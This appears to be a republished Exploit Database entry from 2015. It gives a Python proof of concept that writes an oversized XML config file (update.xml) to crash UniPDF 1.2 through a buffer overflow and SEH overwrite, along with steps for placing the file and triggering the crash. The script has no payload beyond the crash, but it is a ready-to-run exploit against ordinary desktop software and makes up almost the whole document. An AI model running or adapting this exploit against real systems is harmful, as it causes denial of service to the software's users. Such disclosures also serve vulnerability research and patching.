UniPDF 1.2 – ‘xml’ Buffer Overflow Crash (PoC)

• Exploit Database
• 107 阅读

• 作者： Avinash Thapa
  日期： 2015-04-27
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36841/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  # Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC # Author : Avinash Kumar Thapa "-Acid" # Date of Testing :25th April 2015 # Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic # Vendor Homepage: http://unipdf.com/ # Software Link: http://unipdf.com/file/unipdf-setup.exe # Steps to reproduce the Crash is: # Step 1: Run the POC # Step 2: Go to local Disk C:\Program Files\UniPDF and copy the POC there # Step 3 : Run the UniPdf.exe   buff2 = "\x41" * 3000 crash = "<config>\n" crash +=" <UserDefine>\n" crash+= "<Language ID=\"0\" />\n" crash +="<Path PathSet=\""+buff2+"\" Path=\"\" />\n" crash +="<ImageFormat set=\"2\" />\n" crash +="<Res set=\"96\" />\n" crash +="<bit set=\"24\" />\n" crash +="<Prefix set=\"\" />\n" crash +="<Doc set=\"1\" />\n" crash +="<Help set=\"1\" />\n" crash += "</UserDefine>\n" crash +="</config>\n"   print "POC Created By -Acid" print " acid.exploit@gmail.com" file = open("update.xml","w") file.write(crash) file.close()